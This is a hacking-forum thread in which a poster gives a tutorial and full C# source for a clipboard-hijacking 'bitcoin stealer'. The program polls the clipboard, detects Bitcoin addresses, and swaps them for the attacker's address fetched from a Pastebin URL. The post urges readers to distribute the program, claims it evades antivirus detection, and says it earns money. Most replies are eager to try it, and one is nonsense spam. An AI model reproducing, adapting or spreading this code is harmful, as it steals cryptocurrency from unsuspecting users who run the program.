Sign in to follow this  
BataBo

Undetectable bitcoin stealer *For C# developers*

Recommended Posts

Ok so how does this work?

 

User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below)

 

 

[hide]So lets start with the tutorial

1.Make paste bin account and make a paste in the paste you should write your bitcoin address

You need to make account in case you change your btc address you can just edit paste without editing source code

2.Get raw form of your paste and save it somewhere

3.Use this code in your application:

using System;
using System.Net;
using System.Threading;
using System.Windows.Forms;
...
private static readonly WebClient client = new WebClient();
...
Thread thread1 = new Thread(BitcoinStealer);
thread1.SetApartmentState(ApartmentState.STA);
thread1.Start();
...
static void BitcoinStealer()
       {
           string b = string.Empty;
           for (; ; )
           {
               try
               {
                   string text = Clipboard.GetText();
                   Console.WriteLine(text);
                   if (text.Length >= 26 && text.Length <= 35 && (text.StartsWith("1") || text.StartsWith("3") || text.StartsWith("bc1")) && text != b)
                   {

                       Clipboard.SetText(client.DownloadString("https://pastebin.com/raw/"));
                   }
                   b = text;
                   Thread.Sleep(150);
               }
               catch (Exception)
               {
               }
           }
       }

4.Replace copy your paste in Clipboard.SetText(client.DownloadString("https://pastebin.com/raw/"));

5.Distribute your application

 

So what this pretty much does is when user copies his btc address program detects it and replaces it with address you specified

 

This is completely undetectable as you can see here: https://www.virustotal.com/gui/file/2d4362d168e6b11b65fa039bdba906e9650a3eec29fe752f03c9330cd79dafcb/details

 

And if you are a popular guy you can make quite a lot with this method

[/hide]

Share this post


Link to post
Share on other sites

A purple pig and a green donkey flew a kite in the middle of the night and ended up sunburnt.

I want more detailed information.

Is it free?

Malls are great places to shop; I can find everything I need under one roof.

Don't step on the broken glass.

Share this post


Link to post
Share on other sites

I check, thanks for this

Share this post


Link to post
Share on other sites

You are a very good

Share this post


Link to post
Share on other sites

Ok so how does this work?

 

User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below)

 

 

 

 

mans cant wait to try this right quick :fiesta: :ezy:

Share this post


Link to post
Share on other sites

uhhh i think its a virus but ok

Share this post


Link to post
Share on other sites

Ok so how does this work?

 

User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below)

 

 

 

 

seems cool lets see

Share this post


Link to post
Share on other sites

ooof lets give her a go

Share this post


Link to post
Share on other sites

can i try this, waoooww !!!!

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this